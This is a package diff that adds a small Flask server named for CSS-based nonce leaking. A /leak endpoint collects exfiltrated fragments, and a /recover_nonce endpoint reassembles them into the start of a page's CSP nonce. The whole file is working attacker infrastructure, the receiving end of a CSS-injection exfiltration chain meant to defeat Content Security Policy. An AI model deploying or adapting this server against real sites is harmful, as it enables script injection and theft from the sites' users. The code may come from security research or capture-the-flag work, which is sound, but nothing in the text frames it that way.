css_leak_nonce 1.0.0 → 1.0.2

package/server.py

@@ -0,0 +1,30 @@
+from flask import Flask, request
+
+app = Flask(__name__)
+
+leaks = []
+
+@app.route("/leak")
+def leak():
+    global leaks
+    if request.args.get("x"):
+        leaks.append(request.args.get("x"))
+    return "OK"
+@app.route("/recover_nonce")
+def recover():
+    the_start = ""
+    if len(leaks):
+        for part in leaks:
+            is_start = True
+            for substr in leaks:
+                if part != substr and part[0:2] in substr:
+                    is_start = False
+            if is_start:
+                the_start = part
+                break 
+    if the_start:
+        return f"start of nonce is {the_start}"
+
+
+
+app.run("0.0.0.0", 3000)